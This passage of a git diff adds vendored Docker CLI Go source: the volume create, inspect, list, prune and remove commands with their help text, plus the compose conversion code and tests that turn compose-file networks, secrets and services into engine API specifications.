+	_, err = io.Copy(tmpFile, r)
+	tmpFile.Close()
+
+	if err != nil {
+		os.Remove(tmpPath)
+		return err
+	}
+
+	if err = os.Rename(tmpPath, outfile); err != nil {
+		os.Remove(tmpPath)
+		return err
+	}
+
+	return nil
+}
+
+// capitalizeFirst capitalizes the first character of string
+func capitalizeFirst(s string) string {
+	switch l := len(s); l {
+	case 0:
+		return s
+	case 1:
+		return strings.ToLower(s)
+	default:
+		return strings.ToUpper(string(s[0])) + strings.ToLower(s[1:])
+	}
+}
+
+// PrettyPrint outputs arbitrary data for human formatted output by uppercasing the first letter.
+func PrettyPrint(i interface{}) string {
+	switch t := i.(type) {
+	case nil:
+		return "None"
+	case string:
+		return capitalizeFirst(t)
+	default:
+		return capitalizeFirst(fmt.Sprintf("%s", t))
+	}
+}
+
+// PromptForConfirmation requests and checks confirmation from user.
+// This will display the provided message followed by ' [y/N] '. If
+// the user input 'y' or 'Y' it returns true other false.  If no
+// message is provided "Are you sure you want to proceed? [y/N] "
+// will be used instead.
+func PromptForConfirmation(ins *InStream, outs *OutStream, message string) bool {
+	if message == "" {
+		message = "Are you sure you want to proceed?"
+	}
+	message += " [y/N] "
+
+	fmt.Fprintf(outs, message)
+
+	// On Windows, force the use of the regular OS stdin stream.
+	if runtime.GOOS == "windows" {
+		ins = NewInStream(os.Stdin)
+	}
+
+	answer := ""
+	n, _ := fmt.Fscan(ins, &answer)
+	if n != 1 || (answer != "y" && answer != "Y") {
+		return false
+	}
+
+	return true
+}
diff --git a/vendor/github.com/docker/docker/cli/command/volume/cmd.go b/vendor/github.com/docker/docker/cli/command/volume/cmd.go
new file mode 100644
index 0000000000..40862f29d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/volume/cmd.go
@@ -0,0 +1,45 @@
+package volume
+
+import (
+	"github.com/spf13/cobra"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+)
+
+// NewVolumeCommand returns a cobra command for `volume` subcommands
+func NewVolumeCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := &cobra.Command{
+		Use:   "volume COMMAND",
+		Short: "Manage volumes",
+		Long:  volumeDescription,
+		Args:  cli.NoArgs,
+		RunE:  dockerCli.ShowHelp,
+	}
+	cmd.AddCommand(
+		newCreateCommand(dockerCli),
+		newInspectCommand(dockerCli),
+		newListCommand(dockerCli),
+		newRemoveCommand(dockerCli),
+		NewPruneCommand(dockerCli),
+	)
+	return cmd
+}
+
+var volumeDescription = `
+The **docker volume** command has subcommands for managing data volumes. A data
+volume is a specially-designated directory that by-passes storage driver
+management.
+
+Data volumes persist data independent of a container's life cycle. When you
+delete a container, the Docker daemon does not delete any data volumes. You can
+share volumes across multiple containers. Moreover, you can share data volumes
+with other computing resources in your system.
+
+To see help for a subcommand, use:
+
+    docker volume COMMAND --help
+
+For full details on using docker volume visit Docker's online documentation.
+
+`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/create.go b/vendor/github.com/docker/docker/cli/command/volume/create.go
new file mode 100644
index 0000000000..7b2a7e3318
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/volume/create.go
@@ -0,0 +1,111 @@
+package volume
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+)
+
+type createOptions struct {
+	name       string
+	driver     string
+	driverOpts opts.MapOpts
+	labels     opts.ListOpts
+}
+
+func newCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := createOptions{
+		driverOpts: *opts.NewMapOpts(nil, nil),
+		labels:     opts.NewListOpts(runconfigopts.ValidateEnv),
+	}
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] [VOLUME]",
+		Short: "Create a volume",
+		Long:  createDescription,
+		Args:  cli.RequiresMaxArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if len(args) == 1 {
+				if opts.name != "" {
+					fmt.Fprint(dockerCli.Err(), "Conflicting options: either specify --name or provide positional arg, not both\n")
+					return cli.StatusError{StatusCode: 1}
+				}
+				opts.name = args[0]
+			}
+			return runCreate(dockerCli, opts)
+		},
+	}
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.driver, "driver", "d", "local", "Specify volume driver name")
+	flags.StringVar(&opts.name, "name", "", "Specify volume name")
+	flags.Lookup("name").Hidden = true
+	flags.VarP(&opts.driverOpts, "opt", "o", "Set driver specific options")
+	flags.Var(&opts.labels, "label", "Set metadata for a volume")
+
+	return cmd
+}
+
+func runCreate(dockerCli *command.DockerCli, opts createOptions) error {
+	client := dockerCli.Client()
+
+	volReq := volumetypes.VolumesCreateBody{
+		Driver:     opts.driver,
+		DriverOpts: opts.driverOpts.GetAll(),
+		Name:       opts.name,
+		Labels:     runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()),
+	}
+
+	vol, err := client.VolumeCreate(context.Background(), volReq)
+	if err != nil {
+		return err
+	}
+
+	fmt.Fprintf(dockerCli.Out(), "%s\n", vol.Name)
+	return nil
+}
+
+var createDescription = `
+Creates a new volume that containers can consume and store data in. If a name
+is not specified, Docker generates a random name. You create a volume and then
+configure the container to use it, for example:
+
+    $ docker volume create hello
+    hello
+    $ docker run -d -v hello:/world busybox ls /world
+
+The mount is created inside the container's **/src** directory. Docker doesn't
+not support relative paths for mount points inside the container.
+
+Multiple containers can use the same volume in the same time period. This is
+useful if two containers need access to shared data. For example, if one
+container writes and the other reads the data.
+
+## Driver specific options
+
+Some volume drivers may take options to customize the volume creation. Use the
+**-o** or **--opt** flags to pass driver options:
+
+    $ docker volume create --driver fake --opt tardis=blue --opt timey=wimey
+
+These options are passed directly to the volume driver. Options for different
+volume drivers may do different things (or nothing at all).
+
+The built-in **local** driver on Windows does not support any options.
+
+The built-in **local** driver on Linux accepts options similar to the linux
+**mount** command:
+
+    $ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000
+
+Another example:
+
+    $ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2
+
+`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/inspect.go b/vendor/github.com/docker/docker/cli/command/volume/inspect.go
new file mode 100644
index 0000000000..5eb8ad2516
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/volume/inspect.go
@@ -0,0 +1,55 @@
+package volume
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/spf13/cobra"
+)
+
+type inspectOptions struct {
+	format string
+	names  []string
+}
+
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] VOLUME [VOLUME...]",
+		Short: "Display detailed information on one or more volumes",
+		Long:  inspectDescription,
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.names = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+
+	ctx := context.Background()
+
+	getVolFunc := func(name string) (interface{}, []byte, error) {
+		i, err := client.VolumeInspect(ctx, name)
+		return i, nil, err
+	}
+
+	return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getVolFunc)
+}
+
+var inspectDescription = `
+Returns information about one or more volumes. By default, this command renders
+all results in a JSON array. You can specify an alternate format to execute a
+given template is executed for each result. Go's https://golang.org/pkg/text/template/
+package describes all the details of the format.
+
+`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/list.go b/vendor/github.com/docker/docker/cli/command/volume/list.go
new file mode 100644
index 0000000000..d76006a1b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/volume/list.go
@@ -0,0 +1,91 @@
+package volume
+
+import (
+	"sort"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/docker/docker/opts"
+	"github.com/spf13/cobra"
+)
+
+type byVolumeName []*types.Volume
+
+func (r byVolumeName) Len() int      { return len(r) }
+func (r byVolumeName) Swap(i, j int) { r[i], r[j] = r[j], r[i] }
+func (r byVolumeName) Less(i, j int) bool {
+	return r[i].Name < r[j].Name
+}
+
+type listOptions struct {
+	quiet  bool
+	format string
+	filter opts.FilterOpt
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := listOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:     "ls [OPTIONS]",
+		Aliases: []string{"list"},
+		Short:   "List volumes",
+		Long:    listDescription,
+		Args:    cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runList(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display volume names")
+	flags.StringVar(&opts.format, "format", "", "Pretty-print volumes using a Go template")
+	flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 'dangling=true')")
+
+	return cmd
+}
+
+func runList(dockerCli *command.DockerCli, opts listOptions) error {
+	client := dockerCli.Client()
+	volumes, err := client.VolumeList(context.Background(), opts.filter.Value())
+	if err != nil {
+		return err
+	}
+
+	format := opts.format
+	if len(format) == 0 {
+		if len(dockerCli.ConfigFile().VolumesFormat) > 0 && !opts.quiet {
+			format = dockerCli.ConfigFile().VolumesFormat
+		} else {
+			format = formatter.TableFormatKey
+		}
+	}
+
+	sort.Sort(byVolumeName(volumes.Volumes))
+
+	volumeCtx := formatter.Context{
+		Output: dockerCli.Out(),
+		Format: formatter.NewVolumeFormat(format, opts.quiet),
+	}
+	return formatter.VolumeWrite(volumeCtx, volumes.Volumes)
+}
+
+var listDescription = `
+
+Lists all the volumes Docker manages. You can filter using the **-f** or
+**--filter** flag. The filtering format is a **key=value** pair. To specify
+more than one filter,  pass multiple flags (for example,
+**--filter "foo=bar" --filter "bif=baz"**)
+
+The currently supported filters are:
+
+* **dangling** (boolean - **true** or **false**, **1** or **0**)
+* **driver** (a volume driver's name)
+* **label** (**label=<key>** or **label=<key>=<value>**)
+* **name** (a volume's name)
+
+`
diff --git a/vendor/github.com/docker/docker/cli/command/volume/prune.go b/vendor/github.com/docker/docker/cli/command/volume/prune.go
new file mode 100644
index 0000000000..405fbeb295
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/volume/prune.go
@@ -0,0 +1,75 @@
+package volume
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	units "github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type pruneOptions struct {
+	force bool
+}
+
+// NewPruneCommand returns a new cobra prune command for volumes
+func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pruneOptions
+
+	cmd := &cobra.Command{
+		Use:   "prune [OPTIONS]",
+		Short: "Remove all unused volumes",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			spaceReclaimed, output, err := runPrune(dockerCli, opts)
+			if err != nil {
+				return err
+			}
+			if output != "" {
+				fmt.Fprintln(dockerCli.Out(), output)
+			}
+			fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
+			return nil
+		},
+		Tags: map[string]string{"version": "1.25"},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
+
+	return cmd
+}
+
+const warning = `WARNING! This will remove all volumes not used by at least one container.
+Are you sure you want to continue?`
+
+func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) {
+	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
+		return
+	}
+
+	report, err := dockerCli.Client().VolumesPrune(context.Background(), filters.Args{})
+	if err != nil {
+		return
+	}
+
+	if len(report.VolumesDeleted) > 0 {
+		output = "Deleted Volumes:\n"
+		for _, id := range report.VolumesDeleted {
+			output += id + "\n"
+		}
+		spaceReclaimed = report.SpaceReclaimed
+	}
+
+	return
+}
+
+// RunPrune calls the Volume Prune API
+// This returns the amount of space reclaimed and a detailed output string
+func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) {
+	return runPrune(dockerCli, pruneOptions{force: true})
+}
diff --git a/vendor/github.com/docker/docker/cli/command/volume/remove.go b/vendor/github.com/docker/docker/cli/command/volume/remove.go
new file mode 100644
index 0000000000..f464bb3e1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/volume/remove.go
@@ -0,0 +1,68 @@
+package volume
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type removeOptions struct {
+	force bool
+
+	volumes []string
+}
+
+func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts removeOptions
+
+	cmd := &cobra.Command{
+		Use:     "rm [OPTIONS] VOLUME [VOLUME...]",
+		Aliases: []string{"remove"},
+		Short:   "Remove one or more volumes",
+		Long:    removeDescription,
+		Example: removeExample,
+		Args:    cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.volumes = args
+			return runRemove(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of one or more volumes")
+	flags.SetAnnotation("force", "version", []string{"1.25"})
+	return cmd
+}
+
+func runRemove(dockerCli *command.DockerCli, opts *removeOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+	status := 0
+
+	for _, name := range opts.volumes {
+		if err := client.VolumeRemove(ctx, name, opts.force); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "%s\n", err)
+			status = 1
+			continue
+		}
+		fmt.Fprintf(dockerCli.Out(), "%s\n", name)
+	}
+
+	if status != 0 {
+		return cli.StatusError{StatusCode: status}
+	}
+	return nil
+}
+
+var removeDescription = `
+Remove one or more volumes. You cannot remove a volume that is in use by a container.
+`
+
+var removeExample = `
+$ docker volume rm hello
+hello
+`
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose.go b/vendor/github.com/docker/docker/cli/compose/convert/compose.go
new file mode 100644
index 0000000000..8122326aa5
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/convert/compose.go
@@ -0,0 +1,116 @@
+package convert
+
+import (
+	"io/ioutil"
+
+	"github.com/docker/docker/api/types"
+	networktypes "github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/swarm"
+	composetypes "github.com/docker/docker/cli/compose/types"
+)
+
+const (
+	// LabelNamespace is the label used to track stack resources
+	LabelNamespace = "com.docker.stack.namespace"
+)
+
+// Namespace mangles names by prepending the name
+type Namespace struct {
+	name string
+}
+
+// Scope prepends the namespace to a name
+func (n Namespace) Scope(name string) string {
+	return n.name + "_" + name
+}
+
+// Name returns the name of the namespace
+func (n Namespace) Name() string {
+	return n.name
+}
+
+// NewNamespace returns a new Namespace for scoping of names
+func NewNamespace(name string) Namespace {
+	return Namespace{name: name}
+}
+
+// AddStackLabel returns labels with the namespace label added
+func AddStackLabel(namespace Namespace, labels map[string]string) map[string]string {
+	if labels == nil {
+		labels = make(map[string]string)
+	}
+	labels[LabelNamespace] = namespace.name
+	return labels
+}
+
+type networkMap map[string]composetypes.NetworkConfig
+
+// Networks converts networks from the compose-file type to the engine API type
+func Networks(
+	namespace Namespace,
+	networks networkMap,
+	servicesNetworks map[string]struct{},
+) (map[string]types.NetworkCreate, []string) {
+	if networks == nil {
+		networks = make(map[string]composetypes.NetworkConfig)
+	}
+
+	externalNetworks := []string{}
+	result := make(map[string]types.NetworkCreate)
+
+	for internalName := range servicesNetworks {
+		network := networks[internalName]
+		if network.External.External {
+			externalNetworks = append(externalNetworks, network.External.Name)
+			continue
+		}
+
+		createOpts := types.NetworkCreate{
+			Labels:   AddStackLabel(namespace, network.Labels),
+			Driver:   network.Driver,
+			Options:  network.DriverOpts,
+			Internal: network.Internal,
+		}
+
+		if network.Ipam.Driver != "" || len(network.Ipam.Config) > 0 {
+			createOpts.IPAM = &networktypes.IPAM{}
+		}
+
+		if network.Ipam.Driver != "" {
+			createOpts.IPAM.Driver = network.Ipam.Driver
+		}
+		for _, ipamConfig := range network.Ipam.Config {
+			config := networktypes.IPAMConfig{
+				Subnet: ipamConfig.Subnet,
+			}
+			createOpts.IPAM.Config = append(createOpts.IPAM.Config, config)
+		}
+		result[internalName] = createOpts
+	}
+
+	return result, externalNetworks
+}
+
+// Secrets converts secrets from the Compose type to the engine API type
+func Secrets(namespace Namespace, secrets map[string]composetypes.SecretConfig) ([]swarm.SecretSpec, error) {
+	result := []swarm.SecretSpec{}
+	for name, secret := range secrets {
+		if secret.External.External {
+			continue
+		}
+
+		data, err := ioutil.ReadFile(secret.File)
+		if err != nil {
+			return nil, err
+		}
+
+		result = append(result, swarm.SecretSpec{
+			Annotations: swarm.Annotations{
+				Name:   namespace.Scope(name),
+				Labels: AddStackLabel(namespace, secret.Labels),
+			},
+			Data: data,
+		})
+	}
+	return result, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go
new file mode 100644
index 0000000000..f333d73fda
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go
@@ -0,0 +1,122 @@
+package convert
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/network"
+	composetypes "github.com/docker/docker/cli/compose/types"
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/docker/docker/pkg/testutil/tempfile"
+)
+
+func TestNamespaceScope(t *testing.T) {
+	scoped := Namespace{name: "foo"}.Scope("bar")
+	assert.Equal(t, scoped, "foo_bar")
+}
+
+func TestAddStackLabel(t *testing.T) {
+	labels := map[string]string{
+		"something": "labeled",
+	}
+	actual := AddStackLabel(Namespace{name: "foo"}, labels)
+	expected := map[string]string{
+		"something":    "labeled",
+		LabelNamespace: "foo",
+	}
+	assert.DeepEqual(t, actual, expected)
+}
+
+func TestNetworks(t *testing.T) {
+	namespace := Namespace{name: "foo"}
+	source := networkMap{
+		"normal": composetypes.NetworkConfig{
+			Driver: "overlay",
+			DriverOpts: map[string]string{
+				"opt": "value",
+			},
+			Ipam: composetypes.IPAMConfig{
+				Driver: "driver",
+				Config: []*composetypes.IPAMPool{
+					{
+						Subnet: "10.0.0.0",
+					},
+				},
+			},
+			Labels: map[string]string{
+				"something": "labeled",
+			},
+		},
+		"outside": composetypes.NetworkConfig{
+			External: composetypes.External{
+				External: true,
+				Name:     "special",
+			},
+		},
+	}
+	expected := map[string]types.NetworkCreate{
+		"default": {
+			Labels: map[string]string{
+				LabelNamespace: "foo",
+			},
+		},
+		"normal": {
+			Driver: "overlay",
+			IPAM: &network.IPAM{
+				Driver: "driver",
+				Config: []network.IPAMConfig{
+					{
+						Subnet: "10.0.0.0",
+					},
+				},
+			},
+			Options: map[string]string{
+				"opt": "value",
+			},
+			Labels: map[string]string{
+				LabelNamespace: "foo",
+				"something":    "labeled",
+			},
+		},
+	}
+
+	serviceNetworks := map[string]struct{}{
+		"default": {},
+		"normal":  {},
+		"outside": {},
+	}
+	networks, externals := Networks(namespace, source, serviceNetworks)
+	assert.DeepEqual(t, networks, expected)
+	assert.DeepEqual(t, externals, []string{"special"})
+}
+
+func TestSecrets(t *testing.T) {
+	namespace := Namespace{name: "foo"}
+
+	secretText := "this is the first secret"
+	secretFile := tempfile.NewTempFile(t, "convert-secrets", secretText)
+	defer secretFile.Remove()
+
+	source := map[string]composetypes.SecretConfig{
+		"one": {
+			File:   secretFile.Name(),
+			Labels: map[string]string{"monster": "mash"},
+		},
+		"ext": {
+			External: composetypes.External{
+				External: true,
+			},
+		},
+	}
+
+	specs, err := Secrets(namespace, source)
+	assert.NilError(t, err)
+	assert.Equal(t, len(specs), 1)
+	secret := specs[0]
+	assert.Equal(t, secret.Name, "foo_one")
+	assert.DeepEqual(t, secret.Labels, map[string]string{
+		"monster":      "mash",
+		LabelNamespace: "foo",
+	})
+	assert.DeepEqual(t, secret.Data, []byte(secretText))
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service.go b/vendor/github.com/docker/docker/cli/compose/convert/service.go
new file mode 100644
index 0000000000..4a5489562c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/convert/service.go
@@ -0,0 +1,416 @@
+package convert
+
+import (
+	"fmt"
+	"os"
+	"sort"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/swarm"
+	servicecli "github.com/docker/docker/cli/command/service"
+	composetypes "github.com/docker/docker/cli/compose/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/opts"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-connections/nat"
+)
+
+// Services from compose-file types to engine API types
+// TODO: fix secrets API so that SecretAPIClient is not required here
+func Services(
+	namespace Namespace,
+	config *composetypes.Config,
+	client client.SecretAPIClient,
+) (map[string]swarm.ServiceSpec, error) {
+	result := make(map[string]swarm.ServiceSpec)
+
+	services := config.Services
+	volumes := config.Volumes
+	networks := config.Networks
+
+	for _, service := range services {
+
+		secrets, err := convertServiceSecrets(client, namespace, service.Secrets, config.Secrets)
+		if err != nil {
+			return nil, err
+		}
+		serviceSpec, err := convertService(namespace, service, networks, volumes, secrets)
+		if err != nil {
+			return nil, err
+		}
+		result[service.Name] = serviceSpec
+	}
+
+	return result, nil
+}
+
+func convertService(
+	namespace Namespace,
+	service composetypes.ServiceConfig,
+	networkConfigs map[string]composetypes.NetworkConfig,
+	volumes map[string]composetypes.VolumeConfig,
+	secrets []*swarm.SecretReference,
+) (swarm.ServiceSpec, error) {
+	name := namespace.Scope(service.Name)
+
+	endpoint, err := convertEndpointSpec(service.Ports)
+	if err != nil {
+		return swarm.ServiceSpec{}, err
+	}
+
+	mode, err := convertDeployMode(service.Deploy.Mode, service.Deploy.Replicas)
+	if err != nil {
+		return swarm.ServiceSpec{}, err
+	}
+
+	mounts, err := Volumes(service.Volumes, volumes, namespace)
+	if err != nil {
+		// TODO: better error message (include service name)
+		return swarm.ServiceSpec{}, err
+	}
+
+	resources, err := convertResources(service.Deploy.Resources)
+	if err != nil {
+		return swarm.ServiceSpec{}, err
+	}
+
+	restartPolicy, err := convertRestartPolicy(
+		service.Restart, service.Deploy.RestartPolicy)
+	if err != nil {
+		return swarm.ServiceSpec{}, err
+	}
+
+	healthcheck, err := convertHealthcheck(service.HealthCheck)
+	if err != nil {
+		return swarm.ServiceSpec{}, err
+	}
+
+	networks, err := convertServiceNetworks(service.Networks, networkConfigs, namespace, service.Name)
+	if err != nil {
+		return swarm.ServiceSpec{}, err
+	}
+
+	var logDriver *swarm.Driver
+	if service.Logging != nil {
+		logDriver = &swarm.Driver{
+			Name:    service.Logging.Driver,
+			Options: service.Logging.Options,
+		}
+	}
+
+	serviceSpec := swarm.ServiceSpec{
+		Annotations: swarm.Annotations{
+			Name:   name,
+			Labels: AddStackLabel(namespace, service.Deploy.Labels),
+		},
+		TaskTemplate: swarm.TaskSpec{
+			ContainerSpec: swarm.ContainerSpec{
+				Image:           service.Image,
+				Command:         service.Entrypoint,
+				Args:            service.Command,
+				Hostname:        service.Hostname,
+				Hosts:           sortStrings(convertExtraHosts(service.ExtraHosts)),
+				Healthcheck:     healthcheck,
+				Env:             sortStrings(convertEnvironment(service.Environment)),
+				Labels:          AddStackLabel(namespace, service.Labels),
+				Dir:             service.WorkingDir,
+				User:            service.User,
+				Mounts:          mounts,
+				StopGracePeriod: service.StopGracePeriod,
+				TTY:             service.Tty,
+				OpenStdin:       service.StdinOpen,
+				Secrets:         secrets,
+			},
+			LogDriver:     logDriver,
+			Resources:     resources,
+			RestartPolicy: restartPolicy,
+			Placement: &swarm.Placement{
+				Constraints: service.Deploy.Placement.Constraints,
+			},
+		},
+		EndpointSpec: endpoint,
+		Mode:         mode,
+		Networks:     networks,
+		UpdateConfig: convertUpdateConfig(service.Deploy.UpdateConfig),
+	}
+
+	return serviceSpec, nil
+}
+
+func sortStrings(strs []string) []string {
+	sort.Strings(strs)
+	return strs
+}
+
+type byNetworkTarget []swarm.NetworkAttachmentConfig
+
+func (a byNetworkTarget) Len() int           { return len(a) }
+func (a byNetworkTarget) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
+func (a byNetworkTarget) Less(i, j int) bool { return a[i].Target < a[j].Target }
+
+func convertServiceNetworks(
+	networks map[string]*composetypes.ServiceNetworkConfig,
+	networkConfigs networkMap,
+	namespace Namespace,
+	name string,
+) ([]swarm.NetworkAttachmentConfig, error) {
+	if len(networks) == 0 {
+		return []swarm.NetworkAttachmentConfig{
+			{
+				Target:  namespace.Scope("default"),
+				Aliases: []string{name},
+			},
+		}, nil
+	}
+
+	nets := []swarm.NetworkAttachmentConfig{}
+	for networkName, network := range networks {
+		networkConfig, ok := networkConfigs[networkName]
+		if !ok {
+			return []swarm.NetworkAttachmentConfig{}, fmt.Errorf(
+				"service %q references network %q, which is not declared", name, networkName)
+		}
+		var aliases []string
+		if network != nil {
+			aliases = network.Aliases
+		}
+		target := namespace.Scope(networkName)
+		if networkConfig.External.External {
+			target = networkConfig.External.Name
+		}
+		nets = append(nets, swarm.NetworkAttachmentConfig{
+			Target:  target,
+			Aliases: append(aliases, name),
+		})
+	}
+
+	sort.Sort(byNetworkTarget(nets))
+
+	return nets, nil
+}
+
+// TODO: fix secrets API so that SecretAPIClient is not required here
+func convertServiceSecrets(
+	client client.SecretAPIClient,
+	namespace Namespace,
+	secrets []composetypes.ServiceSecretConfig,
+	secretSpecs map[string]composetypes.SecretConfig,
+) ([]*swarm.SecretReference, error) {
+	opts := []*types.SecretRequestOption{}
+	for _, secret := range secrets {
+		target := secret.Target
+		if target == "" {
+			target = secret.Source
+		}
+
+		source := namespace.Scope(secret.Source)
+		secretSpec := secretSpecs[secret.Source]
+		if secretSpec.External.External {
+			source = secretSpec.External.Name
+		}
+
+		uid := secret.UID
+		gid := secret.GID
+		if uid == "" {
+			uid = "0"
+		}
+		if gid == "" {
+			gid = "0"
+		}
+
+		opts = append(opts, &types.SecretRequestOption{
+			Source: source,
+			Target: target,
+			UID:    uid,
+			GID:    gid,
+			Mode:   os.FileMode(secret.Mode),
+		})
+	}
+
+	return servicecli.ParseSecrets(client, opts)
+}
+
+func convertExtraHosts(extraHosts map[string]string) []string {
+	hosts := []string{}
+	for host, ip := range extraHosts {
+		hosts = append(hosts, fmt.Sprintf("%s %s", ip, host))
+	}
+	return hosts
+}
+
+func convertHealthcheck(healthcheck *composetypes.HealthCheckConfig) (*container.HealthConfig, error) {
+	if healthcheck == nil {
+		return nil, nil
+	}
+	var (
+		err               error
+		timeout, interval time.Duration
+		retries           int
+	)
+	if healthcheck.Disable {
+		if len(healthcheck.Test) != 0 {
+			return nil, fmt.Errorf("test and disable can't be set at the same time")
+		}
+		return &container.HealthConfig{
+			Test: []string{"NONE"},
+		}, nil
+
+	}
+	if healthcheck.Timeout != "" {
+		timeout, err = time.ParseDuration(healthcheck.Timeout)
+		if err != nil {
+			return nil, err
+		}
+	}
+	if healthcheck.Interval != "" {
+		interval, err = time.ParseDuration(healthcheck.Interval)
+		if err != nil {
+			return nil, err
+		}
+	}
+	if healthcheck.Retries != nil {
+		retries = int(*healthcheck.Retries)
+	}
+	return &container.HealthConfig{
+		Test:     healthcheck.Test,
+		Timeout:  timeout,
+		Interval: interval,
+		Retries:  retries,
+	}, nil
+}
+
+func convertRestartPolicy(restart string, source *composetypes.RestartPolicy) (*swarm.RestartPolicy, error) {
+	// TODO: log if restart is being ignored
+	if source == nil {
+		policy, err := runconfigopts.ParseRestartPolicy(restart)
+		if err != nil {
+			return nil, err
+		}
+		switch {
+		case policy.IsNone():
+			return nil, nil
+		case policy.IsAlways(), policy.IsUnlessStopped():
+			return &swarm.RestartPolicy{
+				Condition: swarm.RestartPolicyConditionAny,
+			}, nil
+		case policy.IsOnFailure():
+			attempts := uint64(policy.MaximumRetryCount)
+			return &swarm.RestartPolicy{
+				Condition:   swarm.RestartPolicyConditionOnFailure,
+				MaxAttempts: &attempts,
+			}, nil
+		default:
+			return nil, fmt.Errorf("unknown restart policy: %s", restart)
+		}
+	}
+	return &swarm.RestartPolicy{
+		Condition:   swarm.RestartPolicyCondition(source.Condition),
+		Delay:       source.Delay,
+		MaxAttempts: source.MaxAttempts,
+		Window:      source.Window,
+	}, nil
+}
+
+func convertUpdateConfig(source *composetypes.UpdateConfig) *swarm.UpdateConfig {
+	if source == nil {
+		return nil
+	}
+	parallel := uint64(1)
+	if source.Parallelism != nil {
+		parallel = *source.Parallelism
+	}
+	return &swarm.UpdateConfig{
+		Parallelism:     parallel,
+		Delay:           source.Delay,
+		FailureAction:   source.FailureAction,
+		Monitor:         source.Monitor,
+		MaxFailureRatio: source.MaxFailureRatio,
+	}
+}
+
+func convertResources(source composetypes.Resources) (*swarm.ResourceRequirements, error) {
+	resources := &swarm.ResourceRequirements{}
+	var err error
+	if source.Limits != nil {
